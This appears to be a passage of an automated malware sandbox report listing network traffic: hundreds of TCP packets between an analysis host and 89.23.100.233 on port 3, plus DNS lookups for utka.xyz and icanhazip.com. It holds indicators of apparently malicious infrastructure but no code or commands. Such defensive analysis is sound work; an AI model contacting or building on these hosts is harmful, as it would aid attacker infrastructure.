Oct 9, 2024 16:30:20.880022049 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880031109 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880069971 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.880198956 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880290031 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.880455971 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880491972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.880542040 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880757093 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.880831957 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.880908012 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881001949 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.881050110 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881231070 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881234884 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.881239891 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881357908 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.881529093 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.881938934 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881947994 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881968021 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881975889 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881984949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.881993055 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882065058 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882256985 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882265091 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882314920 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.882360935 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.882369041 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882407904 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.882577896 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.882586956 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882745981 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:20.882750988 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.882920980 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:20.883086920 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.097055912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.097296953 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.097465992 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.100364923 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.100469112 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.100749969 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.100800991 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.100960016 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.101191044 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.101571083 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.101828098 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.101984978 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.102215052 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.102408886 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.102647066 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.102821112 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.102845907 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.102996111 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.103039026 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.103116035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.103205919 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.103313923 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.103456974 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.103620052 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.103790998 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.103806019 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.103816986 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.103962898 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.104100943 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.104106903 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.104274035 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.104357004 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.104722023 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.105091095 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.106105089 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.106116056 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.106257915 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.106457949 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.106682062 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.106777906 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.107017994 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.107033014 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.107086897 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.107328892 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.107409954 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.107667923 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.118150949 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.118326902 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.118519068 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.118541956 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.118629932 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.118798018 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.119111061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119122982 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119131088 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119431019 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119477987 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.119517088 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.119541883 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119708061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119729996 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.119755030 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.119900942 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.119947910 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.120120049 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.120327950 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.120495081 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.120630980 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.120800018 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.121002913 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.121212006 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.121383905 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.121503115 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.121738911 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.121751070 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.121771097 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.121939898 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.121993065 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.122159958 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.336527109 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.336740971 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.339435101 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.339634895 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.339803934 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.339864016 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.340038061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.340193987 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.340363026 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.340802908 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.341118097 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.341242075 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.341301918 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.341365099 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.341531038 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.341568947 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.341739893 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.341801882 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.342058897 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.342129946 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.342298031 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.342570066 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.342751026 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.342922926 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.344744921 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.344846010 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.344938993 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.345012903 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.345108032 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.345160007 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.345324039 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.345421076 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.345494986 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.345618963 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.345664024 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.346004009 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.356925011 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.357027054 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.357280016 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.357822895 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.357959032 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.357969999 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358129978 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358130932 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358176947 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358347893 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358517885 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358622074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358688116 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358743906 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358753920 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358762980 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358784914 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.358858109 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.358997107 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.359006882 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.359030962 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.359090090 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.359200001 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.359368086 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.359538078 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.359694004 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.359922886 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360023975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360094070 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360127926 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360317945 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360332012 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360403061 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360485077 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360567093 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360702038 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360769987 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.360872030 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.360934019 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.361093998 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.361213923 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.361380100 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.426440954 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.426703930 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.575581074 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.575726032 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.575895071 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.577824116 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.577960014 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.578059912 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.578226089 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.578298092 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.580111027 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.580178022 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.580193996 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.580518961 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.580528021 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.580542088 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.580622911 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.580786943 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.580852985 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.580960989 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.581124067 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.581393003 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.581511974 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.581634045 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.581778049 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.581823111 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.581828117 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.581999063 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.583372116 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.583492041 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.583584070 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.583755016 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.583931923 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.584076881 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.584114075 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.584335089 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.584347010 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.584724903 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.595900059 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.595999002 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.596009970 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.596072912 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.596081972 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.596255064 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.596265078 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.596301079 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.596471071 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.598483086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.598691940 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.598762035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.598870039 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.598912001 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.598933935 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.599061012 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599123955 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.599229097 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599277020 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.599381924 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.599399090 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599560976 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.599602938 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599766016 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599927902 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.599961996 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.600260019 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.723119974 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.814280033 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.816322088 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.816333055 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.819283962 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.819515944 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.819796085 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.819978952 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.820132017 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.820333958 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.820979118 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.821033955 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.821288109 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.821816921 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.821939945 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822057009 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822231054 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822371006 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822381973 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822808981 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822942972 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.822953939 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.823024035 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.823270082 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.823378086 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.824938059 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.834400892 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.835419893 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.838182926 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.838416100 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.838737965 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.839250088 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.839720011 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.839967966 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.840102911 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.840269089 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.840641975 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.840986967 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.841300011 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.841542006 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.841799974 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.841957092 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.842081070 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.842226982 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.842324972 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.842580080 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.842700005 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.852458000 CEST	3	49781	89.23.100.233	192.168.11.30
Oct 9, 2024 16:30:21.884237051 CEST	49781	3	192.168.11.30	89.23.100.233
Oct 9, 2024 16:30:21.884299040 CEST	49777	80	192.168.11.30	104.16.184.241

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 16:29:48.517479897 CEST	56456	53	192.168.11.30	1.1.1.1
Oct 9, 2024 16:29:48.636847973 CEST	53	56456	1.1.1.1	192.168.11.30
Oct 9, 2024 16:30:05.779073000 CEST	63814	53	192.168.11.30	1.1.1.1
Oct 9, 2024 16:30:05.873769999 CEST	53	63814	1.1.1.1	192.168.11.30
Oct 9, 2024 16:30:06.129405022 CEST	65482	53	192.168.11.30	1.1.1.1
Oct 9, 2024 16:30:06.226722956 CEST	53	65482	1.1.1.1	192.168.11.30

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 9, 2024 16:29:48.517479897 CEST	192.168.11.30	1.1.1.1	0xc68a	Standard query (0)	utka.xyz	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:05.779073000 CEST	192.168.11.30	1.1.1.1	0xebfa	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:06.129405022 CEST	192.168.11.30	1.1.1.1	0x3c57	Standard query (0)	229.116.3.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 9, 2024 16:29:48.636847973 CEST	1.1.1.1	192.168.11.30	0xc68a	No error (0)	utka.xyz		84.32.84.151	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:05.873769999 CEST	1.1.1.1	192.168.11.30	0xebfa	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:05.873769999 CEST	1.1.1.1	192.168.11.30	0xebfa	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Oct 9, 2024 16:30:06.226722956 CEST	1.1.1.1	192.168.11.30	0x3c57	Name error (3)	229.116.3.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

utka.xyz

icanhazip.com

HTTP Packets

